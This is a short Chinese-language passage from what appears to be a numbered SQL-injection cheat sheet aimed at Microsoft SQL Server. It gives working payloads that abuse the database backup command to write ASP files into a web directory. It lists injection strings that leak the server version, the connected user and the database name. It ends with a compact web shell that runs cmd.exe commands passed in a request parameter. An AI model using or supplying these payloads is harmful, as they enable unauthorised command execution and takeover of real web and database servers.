14.mssql的backup创建webshell
use model
create table cmd(str image);
insert into cmd(str) values (''<% Dim oScript %>'');
backup database model to disk=''c:\l.asp'';
15.mssql内置函数
;and (select @@version)>0 获得Windows的版本号
;and user_name()=''dbo'' 判断当前系统的连接用户是不是sa
;and (select user_name())>0 爆当前系统的连接用户
;and (select db_name())>0 得到当前连接的数据库
16.简洁的webshell
use model
create table cmd(str image);
insert into cmd(str) values (''<%=server.createobject("wscript.shell").exec("cmd.exe /c
"&request("c")).stdout.readall%>'');
backup database model to disk=''g:\wwwtest\l.asp'';